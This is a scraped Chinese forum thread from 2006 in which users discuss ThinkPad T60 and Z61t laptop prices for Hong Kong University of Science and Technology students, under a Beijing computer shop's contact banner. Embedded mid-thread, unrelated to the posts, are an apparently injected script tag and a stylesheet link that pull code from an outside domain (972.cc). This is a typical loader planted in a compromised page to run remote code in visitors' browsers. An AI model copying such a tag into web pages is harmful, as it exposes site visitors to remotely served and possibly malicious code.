开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

香港科大学生机

关闭 [复制链接]
如附件:

ThinkPad T60/T2400/SXGA+

ThinkPad T60/T2400/SXGA+

ThinkPad Z61t Titanium

ThinkPad Z61t Titanium

ThinkPad T60/T2400/XGA

ThinkPad T60/T2400/XGA
比城大的贵一点
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

海报上被划掉的指导价应该是虚报吧
呵呵

不然XY卖的电脑也不会这么便宜了
科大的都是专业版的所以贵点
原帖由 kkposh 于 2006-8-7 11:01 发表
海报上被划掉的指导价应该是虚报吧
呵呵

不然XY卖的电脑也不会这么便宜了

这得问斑竹,为啥xy这么便宜:ju8:
看来坐地起价成分不少
XY  为什么没有拿宽屏?
如果时间允许我再等2个月,我也会买T60的,没缘分啊
:)
:up:
:han::han::han:
轻轻的我走了 正如我轻轻的来 挥一挥键盘 带走一个帖子:ju8:
来晚了,等烤土豆
为什么国内没有这样的活动